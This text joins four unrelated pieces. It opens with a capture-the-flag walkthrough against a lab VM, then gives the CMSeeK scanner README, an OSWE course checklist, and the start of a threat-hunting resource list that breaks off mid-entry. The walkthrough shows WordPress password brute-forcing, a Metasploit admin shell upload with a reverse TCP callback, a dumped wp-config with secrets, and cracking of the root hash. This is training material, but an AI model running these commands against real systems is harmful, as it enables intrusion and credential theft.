192.168.1.181 + Target Port: 80 + Start Time: 2020-12-19 18:23:23 (GMT-3) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'link' found, with contents: <http://odin/index.php?rest_route=/>; rel="https://api.w.org/" + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Uncommon header 'x-redirect-by' found, with contents: WordPress + No CGI Directories found (use '-C all' to force check all possible dirs) + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /wp-links-opml.php: This WordPress script reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + /: A Wordpress installation was found. + Cookie wordpress_test_cookie created without the httponly flag + /wp-login.php?action=register: Wordpress registration enabled + OSVDB-3268: /wp-content/uploads/: Directory indexing found. + /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information + /wp-login.php: Wordpress login found + 7915 requests: 0 error(s) and 14 item(s) reported on remote host + End Time: 2020-12-19 18:25:15 (GMT-3) (112 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` ``` $ gobuster dir -u http://192.168.1.181 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.txt,.js,/,.html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.181 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: html,php,txt,js,/ [+] Timeout: 10s =============================================================== 2020/12/19 18:23:41 Starting gobuster =============================================================== /index.php (Status: 301) /phpmyadmin (Status: 403) /license.txt (Status: 200) /wp-content (Status: 301) /wp-admin (Status: 301) /readme.html (Status: 200) /wp-trackback.php (Status: 200) /wp-login.php (Status: 200) =============================================================== 2020/12/19 18:25:04 Finished =============================================================== ``` ## WordPress Analysis ``` $ wpscan -e ap,at,u --url http://192.168.1.181 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ยฎ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.11 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... [i] Update completed. [+] URL: http://192.168.1.181/ [192.168.1.181] [+] Started: Sat Dec 19 18:27:40 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.1.181/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] Registration is enabled: http://192.168.1.181/wp-login.php?action=register | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.1.181/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.1.181/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.5.3 identified (Latest, released on 2020-10-30). | Found By: Emoji Settings (Passive Detection) | - http://192.168.1.181/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.1.181/, Match: 'WordPress 5.5.3' [i] The main theme could not be detected. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <========================================> (10 / 10) 100.00% Time: 00:00:00 [i] No Users Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register [+] Finished: Sat Dec 19 18:27:41 2020 [+] Requests Done: 68 [+] Cached Requests: 11 [+] Data Sent: 14.447 KB [+] Data Received: 16.094 MB [+] Memory used: 121.562 MB [+] Elapsed time: 00:00:01 ``` ## WordPress Login Brute Forcing I attempt to crack WordPress login with `wpscan`. ``` $ cat users.txt admin odin $ wpscan --url http://192.168.1.181/ -U users.txt -P /usr/share/wordlists/rockyou.txt _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ยฎ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.11 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.1.181/ [192.168.1.181] [+] Started: Sat Dec 19 18:30:47 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.41 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.1.181/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] Registration is enabled: http://192.168.1.181/wp-login.php?action=register | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.1.181/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.1.181/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.5.3 identified (Latest, released on 2020-10-30). | Found By: Emoji Settings (Passive Detection) | - http://192.168.1.181/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.1.181/, Match: 'WordPress 5.5.3' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=========================================> (22 / 22) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc against 2 user/s [SUCCESS] - admin / qwerty ^Cying odin / israel Time: 00:00:16 < > (852 / 28688804) 0.00% ETA: ??:??:?? [!] Valid Combinations Found: | Username: admin, Password: qwerty [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register [+] Finished: Sat Dec 19 18:31:13 2020 [+] Requests Done: 881 [+] Cached Requests: 28 [+] Data Sent: 453.649 KB [+] Data Received: 524.408 KB [+] Memory used: 181.766 MB [+] Elapsed time: 00:00:25 Scan Aborted: Canceled by User ``` User: **admin**\ Pass: **qwerty** ## Exploitation ``` $ msfconsole msf6 > use exploit/unix/webapp/wp_admin_shell_upload msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password qwerty password => qwerty msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.1.181 rhosts => 192.168.1.181 msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username admin username => admin msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options Module options (exploit/unix/webapp/wp_admin_shell_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD qwerty yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.1.181 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME admin yes The WordPress username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.1.189 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 WordPress msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 192.168.1.189:4444 [*] Authenticating with WordPress using admin:qwerty... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /wp-content/plugins/sVvkpBRBVH/FBafKaYbDY.php... [*] Sending stage (39282 bytes) to 192.168.1.181 [*] Meterpreter session 1 opened (192.168.1.189:4444 -> 192.168.1.181:40366) at 2020-12-19 18:37:29 -0300 [+] Deleted FBafKaYbDY.php [+] Deleted sVvkpBRBVH.php [+] Deleted ../sVvkpBRBVH meterpreter > sysinfo Computer : osboxes OS : Linux osboxes 5.4.0-26-generic #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020 x86_64 Meterpreter : php/linux ``` ## System Users ``` meterpreter > shell Process 1733 created. Channel 1 created. python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@osboxes:$ www-data@osboxes:/$ ls -lah /home total 16K drwxr-xr-x 4 root root 4.0K Dec 4 15:54 . drwxr-xr-x 23 root root 4.0K Jul 5 22:43 .. drwxrw---- 15 osboxes osboxes 4.0K Dec 5 10:05 osboxes drwxr-xr-x 4 rockyou rockyou 4.0K Dec 4 15:58 rockyou www-data@osboxes:/$ cat /home/rockyou/ok Get out of here! ``` ## WordPress Config ``` www-data@osboxes:/$ cat /var/www/html/wp-config.php <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'joomla' ); /** MySQL database username */ define( 'DB_USER', 'joomla' ); /** MySQL database password */ define( 'DB_PASSWORD', 'joomla' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' ); define( 'SECURE_AUTH_KEY', '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' ); define( 'LOGGED_IN_KEY', 'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' ); define( 'NONCE_KEY', '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' ); define( 'AUTH_SALT', '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' ); define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:fmFb@%twt2_z=P((gdUY@HgG5Mq4=q-5e$vg' ); define( 'LOGGED_IN_SALT', '6gs|sWkYAZ@?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' ); define( 'NONCE_SALT', 'xA+mKYMD;]J@>tEi%MT1!<$|<5KBs1AX@C8E|y2WAE=NwR5{3:piVlWHr6JsK[6u' ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; /** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/ ``` Root user hash found: ``` root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7::: ``` ## Cracking Root Hash ``` $ cat root.hash root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7::: $ john -wordlist=/usr/share/wordlists/rockyou.txt root.hash Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status jasmine (root) 1g 0:00:00:00 DONE (2020-12-19 19:02) 9.090g/s 6981p/s 6981c/s 6981C/s 123456..james1 Use the "--show" option to display all of the cracked passwords reliably Session completed ``` User: **root**\ Pass: **jasmine** ## Privilege Escalation ``` www-data@osboxes:/$ su root Password: jasmine root@osboxes:/# id uid=0(root) gid=0(root) groups=0(root) ``` ## Root Flag ``` root@osboxes:~# cat /root/bjorn cฯƒฮทgัฮฑั‚ฯ…โ„“ฮฑั‚ฮนฯƒฮท Have a nice day! aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo= ``` ``` $ echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1WaGtmblBWUXlhWQo=" | base64 -d https://www.youtube.com/watch?v=VhkfnPVQyaY ```
<p align='center'> <img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br> <a href="https://github.com/Tuhinshubhra/CMSeeK/releases/tag/v.1.1.2"><img src="https://img.shields.io/badge/Version-1.1.2-brightgreen.svg?style=style=flat-square" alt="version"></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/"><img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version"></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/stargazers"><img src="https://img.shields.io/github/stars/Tuhinshubhra/CMSeeK.svg" alt="GitHub stars" /></a> <a href="https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE"><img src="https://img.shields.io/github/license/Tuhinshubhra/CMSeeK.svg" alt="GitHub license" /></a> <a href="https://inventory.rawsec.ml/tools.html#CMSeek"><img src="https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg" alt="Rawsec's CyberSecurity Inventory" /></a> <a href="https://twitter.com/r3dhax0r"><img src="https://img.shields.io/twitter/url/https/github.com/Tuhinshubhra/CMSeeK.svg?style=social" alt="Twitter" /></a> </p> ## What is a CMS? > A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*. ## Release History ``` - Version 1.1.2 [19-05-2019] - Version 1.1.1 [01-02-2019] - Version 1.1.0 [28-08-2018] - Version 1.0.9 [21-08-2018] - Version 1.0.8 [14-08-2018] - Version 1.0.7 [07-08-2018] ... ``` [Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG) ## Functions Of CMSeek: - Basic CMS Detection of over 170 CMS - Drupal version detection - Advanced Wordpress Scans - Detects Version - User Enumeration - Plugins Enumeration - Theme Enumeration - Detects Users (3 Detection Methods) - Looks for Version Vulnerabilities and much more! - Advanced Joomla Scans - Version detection - Backup files finder - Admin page finder - Core vulnerability detection - Directory listing check - Config leak detection - Various other checks - Modular bruteforce system - Use pre made bruteforce modules or create your own and integrate with it ## Requirements and Compatibility: CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed. ## Installation and Usage: It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands: - git clone `https://github.com/Tuhinshubhra/CMSeeK` - cd CMSeeK - pip/pip3 install -r requirements.txt For guided scanning: - python3 cmseek.py Else: - python3 cmseek.py -u <target_url> [...] Help menu from the program: ``` USAGE: python3 cmseek.py (for guided scanning) OR python3 cmseek.py [OPTIONS] <Target Specification> SPECIFING TARGET: -u URL, --url URL Target Url -l LIST, --list LIST Path of the file containing list of sites for multi-site scan (comma separated) MANIPULATING SCAN: -i cms, --ignore--cms cms Specify which CMS IDs to skip in order to avoid flase positive. separated by comma "," --strict-cms cms Checks target against a list of provided CMS IDs. separated by comma "," --skip-scanned Skips target if it's CMS was previously detected. RE-DIRECT: --follow-redirect Follows all/any redirect(s) --no-redirect Skips all redirects and tests the input target(s) USER AGENT: -r, --random-agent Use a random user agent --googlebot Use Google bot user agent --user-agent USER_AGENT Specify a custom user agent OUTPUT: -v, --verbose Increase output verbosity VERSION & UPDATING: --update Update CMSeeK (Requires git) --version Show CMSeeK version and exit HELP & MISCELLANEOUS: -h, --help Show this help message and exit --clear-result Delete all the scan result EXAMPLE USAGE: python3 cmseek.py -u example.com # Scan example.com python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com ``` ## Checking For Update: You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update. P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update. ## Detection Methods: CMSeek detects CMS via the following: - HTTP Headers - Generator meta tag - Page source code - robots.txt ## Supported CMSs: CMSeeK currently can detect **170+** CMS. Check the list here: [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory. All the cmss are stored in the following way: ``` cmsID = { 'name':'Name Of CMS', 'url':'Official URL of the CMS', 'vd':'Version Detection (0 for no, 1 for yes)', 'deeps':'Deep Scan (0 for no 1 for yes)' } ``` ## Scan Result: All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well. Here is an example of the json report log: ![Json Log](https://i.imgur.com/5dA9jQg.png) ## Bruteforce Modules: CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this: 1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex 2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module 3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory 4. Open CMSeeK and Rebuild Cache using `R` as the input in the first menu. 5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK. <p align='center'> <img alt="Cache Rebuild Screenshot" width="600px" src="https://i.imgur.com/yhdzTYr.png" /> </p> ## Need More Reasons To Use CMSeeK? If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages. Also you can try reading comments in the code those are pretty random and weird!!! ## Screenshots: <p align="center"> <img alt="Main Menu" src="https://i.imgur.com/Eij6QvX.png" /> <br><em>Main Menu</em><br> <img alt="Scan Result" src="https://i.imgur.com/u0iyLdB.png" /> <br><em>Scan Result</em><br> <img alt="WordPress Scan Result" src="https://i.imgur.com/cOtCJLj.png" /> <br><em>WordPress Scan Result</em><br> </p> ## Guidelines for opening an issue: Please make sure you have the following info attached when opening a new issue: - Target - Exact copy of error or screenshot of error - Your operating system and python version **Issues without these informations might not be answered!** ## Disclaimer: **Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.** ## License: CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE) ## Follow Me @r3dhax0r: [Twitter](https://twitter.com/r3dhax0r) ## Team: [Team : Virtually Unvoid Defensive (VUD)](https://twitter.com/virtuallyunvoid)
# Advanced Web Attacks & Exploitation All efforts for the AWAE course and preparation for the Offensive Security Web Expert (OSWE) exam. ## Study Strategy * Several rounds of course content * First round: * Watch videos * Read text and take good notes * Complete the main exercises * Second round: * Watch videos again * Read text and take more notes as-needed * Craft your own tools and scripts in a language other than python * Complete exercises AND all extra mile exercises * Further study: * Find interesting vulns in open source software, find the vuln from scratch and analyze * Analyze APKs for Android apps. Take 8 hours and analyze several each, tryna find vulns as if you're mid-test and have a time limit to find exploit chains * Find interesting vulns in OSS. * Use vuln apps first to help develop custom regex tools for SAST: Webgoat (Java), JuiceShop (JavaScript), Mutillidae (PHP), .NETGoat (C#) * Check out an app in each relevant language that may not have had any security review done. Try to find some vulns and get some CVEs!! * Check for the main suspects as taught in the course for each app, timebox it, and move on to another one. * Make sure to pay attn to app architecture, request routing, etc in each language: * [ ] Java * [ ] JavaScript (node.js) * [ ] PHP * [ ] C#/.NET * HackTheBox and CTFs (see wetw0rk's prep guide) * SecureCodeWarrior (see bookmark in AWAE) * Codecademy courses * [x] Java * [x] JavaScript * [x] PHP * [x] C# ## Course Completion Taken from publicly-available syllabus. * [x] 1. Introduction * [x] Videos * [x] Read/Notes * [x] 2. Tools & Methodologies * [x] Videos * [x] Read/Notes * [x] 2.1.5 Exercise - Web Inspection * [x] 2.2.1 Exercise - Python Requests * [x] 2.3.3 Exercise - Decompilation * [ ] 3. Atmail Mail Server Appliance: from XSS to RCE * [x] Videos * [x] Read/Notes * [x] 3.3.1 Exercise - Vuln Discovery * [x] 3.4.1 Exercise - Session Hijack * [x] 3.5.4 Exercise - Session Riding * [x] 3.5.5 Extra Mile - Session Riding * [x] 3.6.5 Exercise - globalsaveAction Vuln Analysis * [x] 3.6.7 Exercise - Make it fully automagical * [x] 3.6.8 Extra Mile * [ ] 3.6.8 Extra Mile - Also see if you can background it completely * [x] 4. ATutor Auth Bypass and RCE * [x] Videos * [x] Read/Notes * [x] 4.3.1 Exercise - Vuln Discovery * [x] 4.6.3 Exercise - Data Exfil * [x] 4.6.4 Extra Mile - Data Exfil * [x] 4.7.1 Exercise - ATutor Auth * [x] 4.7.2 Extra Mile - ATutor Auth * [x] 4.8.1 Exercise - ATutor Auth * [x] 4.8.2 Extra Mile - ATutor Auth * [x] 4.9.1 Exercise - File Upload * [x] 4.10.5 Exercise - RCE * [x] 4.10.6 Extra Mile - RCE * [x] 5. ATutor LMS Type Juggling Vuln * [x] Videos * [x] Read/Notes * [x] 5.4.1 Exercise - String Conversion * [x] 5.6.3 Exercise - Loose Comparison * [x] 5.6.4 Extra Mile - Loose Comparison * [ ] 6. ManageEngine Applications Manager AMUserResourcesSyncServlet SQL Injection RCE * [x] Videos * [x] Read/Notes * [x] 6.3.6 Exercise - Vuln Discovery * [x] 6.5.1 Exercise - Blind Bats * [x] 6.6.1 Exercise - Access FS * [x] 6.6.3 Exercise - VBS file [!! Need to do the batch! Got the reverse shell... !!] * [ ] 6.6.4 Extra Mile - Shell via JSP * [x] 6.7.4 Exercise - PostgreSQL Extensions * [x] 6.8.1 Exercise - UDF Reverse Shell * [x] 6.9.3 Exercise - Moar Shells * [ ] 6.9.4 Extra Mile - Moar Shells * [ ] 7. Bassmaster NodeJS Arbitrary JavaScript Injection Vulnerability * [x] Videos * [x] Read/Notes * [x] 7.6.1 Exercise - RevShell * [ ] 7.6.2 Extra Mile - RevShell * [ ] 8. DotNetNuke Deserialization RCE * [x] Videos * [x] Read/Notes * [x] 8.4.3 Exercise - Serialization Basics * [x] 8.4.5 Exercise - Serialization Basics * [x] 8.4.7 Exercise - Serialization Basics * [x] 8.5.3 Exercise - DNN Vuln Analysis * [x] 8.6.4 Exercise - Payload Options * [x] 8.6.7 Exercise - Payload Options * [x] 8.7.1 Exercise - Payload Options * [ ] 8.8.1 Extra Mile - Y SO SERIAL? .NET * [x] 8.8.2 Extra Mile - Y SO SERIAL? Java * [ ] 9. ERPNext Authentication Bypass and Server Side Template Injection * [x] Videos * [ ] Read/Notes * [x] 9.1.1.1 Exercise - Configure Kali SMTPd server * [x] 9.1.2.1 Exercise - Configure remote debugging * [x] 9.1.3.1 Exercise - Configure MariaDB logging * [x] 9.2.3.2 Exercise - Find whitelisted functions * [x] 9.3.1.2 Exercises - SQLi * [x] 9.4.2.1 Exercises - Access the admin acct * [x] 9.5.2.1 Exercise - Find the SSTI * [ ] 9.5.2.2 Extra Mile - Find another instance of SSTI * [x] 9.5.3.1 Exercise - Recreate the `__class__` rendering * [ ] 9.5.3.2 Extra Mile - Alternative filter bypass * [x] 9.6.1.1 Exercises - Recreate the filter bypass and exploit and find other classes to own * [x] 9.6.2.1 Exercises - Recreate RCE and get shell * [ ] 9.6.2.2 Extra Mile - Get output to display * [ ] 10. openCRX Authentication Bypass and Remote Code Execution * [x] Videos * [ ] Read/Notes * [x] 10.2.1.1 Exercise - Recreate the Rando and SecureRando * [x] 10.2.4.1 Exercise - Generate a token list * [ ] 10.2.4.2 Extra Mile - Update token program to take start/stop * [x] 10.2.5.2 Exercises - Reset password * [ ] 10.2.5.3 Extra Mile - Automate the attack chain * [x] 10.3.6.2 Exercises - Recreate the XXE attack * [ ] 10.3.6.3 Extra Mile - Script to parse XXE results * [x] 10.3.8.1 Exercise - Implement the "wrapper" payload * [x] 10.3.9.2 Exercise - Connect to HSQLDB * [x] 10.4.1.1 Exercises - Write file and confirm * [ ] 10.4.2.1 Exercise - Find dir with JSP files * [x] 10.4.3.1 Exercises - Get. That. Shell. * [ ] 11. openITCOCKPITXSSandOSCommandInjection - Blackbox * [x] Videos * [ ] Read/Notes * [x] 11.5.1 Exercise - Recreate the XSS * [x] 11.6.2.1 Exercises - DOM rewrite * [ ] 11.6.2.2 Extra Mile - Prevent new page load * [x] 11.6.3.1 Exercises - Finish the script and initialize the DB * [x] 11.6.4.1 Exercises - Finish the API script and get a fake login page with the XSS * [ ] 11.6.4.2 Extra Mile - Add cookie functionality * [ ] 11.6.5.1 Exercises - Exploit the XSS * [ ] 11.6.5.2 Extra Miles - Beef up dat XSS * [ ] 11.6.6.1 Exercise - Dump the SQLite DB * [x] 11.7.4.1 Exercise - Fuzz and find cmds * [x] 11.7.5.1 Exercise - Test cmd injection * [ ] 11.7.6.1 Exercise - Get a meterpreter shell * [ ] 10.7.7 Extra Mile - Get RCE via administrator session
# Awesome Threat Detection and Hunting [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) > A curated list of awesome threat detection and hunting resources ## Contents - Threat Detection and Hunting - ๐Ÿ”จ [Tools](#tools) - [Detection, Alerting and Automation Platforms](#detection-alerting-and-automation-platforms) - [Endpoint Monitoring](#endpoint-monitoring) - [Network Monitoring](#network-monitoring) - [Email Monitoring](#email-monitoring) - ๐Ÿ” [Detection Rules](#detection-rules) - ๐Ÿ“‘ [Dataset](#dataset) - ๐Ÿ“˜ [Resources](#resources) - [Frameworks](#frameworks) - [Windows](#windows) - [MacOS](#macos) - [Osquery](#osquery) - [DNS](#dns) - [Fingerprinting](#fingerprinting) - [Data Science](#data-science) - [Research Papers](#research-papers) - [Blogs](#blogs) - [Related Awesome Lists](#related-awesome-lists) - ๐ŸŽ™๏ธ [Podcasts](#podcasts) - ๐Ÿ—ž๏ธ [Newsletters](#newsletters) - ๐ŸŽฅ [Videos](#videos) - ๐Ÿ‘ฉโ€๐ŸŽ“ [Trainings](#trainings) - ๐Ÿ‘ฉโ€๐Ÿ’ป [Labs](#labs) - ๐Ÿค– [Twitter](#twitter) - Threat Simulation - ๐Ÿช“ [Tools](#threat-simulation-tools) - ๐Ÿ“• [Resources](#threat-simulation-resources) - [Contribute](#contribute) - [License](#license) ## Tools - [MITRE ATT&CK Navigator](https://mitre.github.io/attack-navigator/enterprise/) ([source code](https://github.com/mitre-attack/attack-navigator)) - The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel. - 